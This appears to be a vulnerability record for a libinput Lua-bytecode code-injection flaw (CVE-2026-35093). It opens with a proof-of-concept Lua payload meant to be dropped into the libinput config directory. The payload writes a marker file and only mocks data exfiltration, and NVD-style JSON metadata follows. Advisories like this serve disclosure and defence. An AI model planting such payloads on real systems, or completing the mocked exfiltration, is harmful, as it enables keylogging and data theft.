CVE-2026-35093

-- PoC Lua script to be compiled to bytecode -- Attacker places this in libinput config directory (e.g., ~/.config/libinput/) local io = require("io") local os = require("os") -- Function to simulate keylogging and data exfiltration local function exploit_payload() -- Attempt to write a proof of execution file local file = io.open("/tmp/libinput_poc.txt", "w") if file then file:write("CVE-2026-35093 Exploit Executed: " .. os.date() .. "\n") file:write("Current User Privileges: " .. os.getenv("USER") .. "\n") file:close() end -- Simulate sending data to external location (mock) -- In a real scenario, this would be a socket connection print("[!] Exfiltrating data...") end -- Execute the payload exploit_payload()

{"cve": {"id": "CVE-2026-35093", "sourceIdentifier": "[email protected]", "published": "2026-04-01T14:16:57.443", "lastModified": "2026-04-07T20:31:19.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libinput. A local attacker who can place a specially crafted Lua bytecode file in certain system or user configuration directories can bypass security restrictions. This allows the attacker to run unauthorized code with the same permissions as the program using libinput, such as a graphical compositor. This could lead to the attacker monitoring keyboard input and sending that information to an external location."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:freedesktop:libinput:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.30.3", "matchCriteriaId": "3829AD08-1AAF-42AA-8CA8-A9053797F35C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:freedesktop:libinput:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.30.4", "versionEndExcluding": "1.31.1", "matchCriteriaId": "A122E860-3D8E-4A07-9460-B636AA4BFC7A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fedoraproject:fedora:43:*:*:*:*:*:*:*", "matchCriteriaId": "E1D1BBE5-0886-4D95-9862-16A4C316F70A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fedoraproject:fedora:44:*:*:*:*:*:*:*", "matchCriteriaId": "DD1E6B15-C7BF-47E1-8034-501385D7B7DD"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-35093", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453839", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://gitlab.freedesktop.org/libinput/libinput/-/work_items/1271", "source": "[email protected]", "tags": ["Broken Link"]}]}}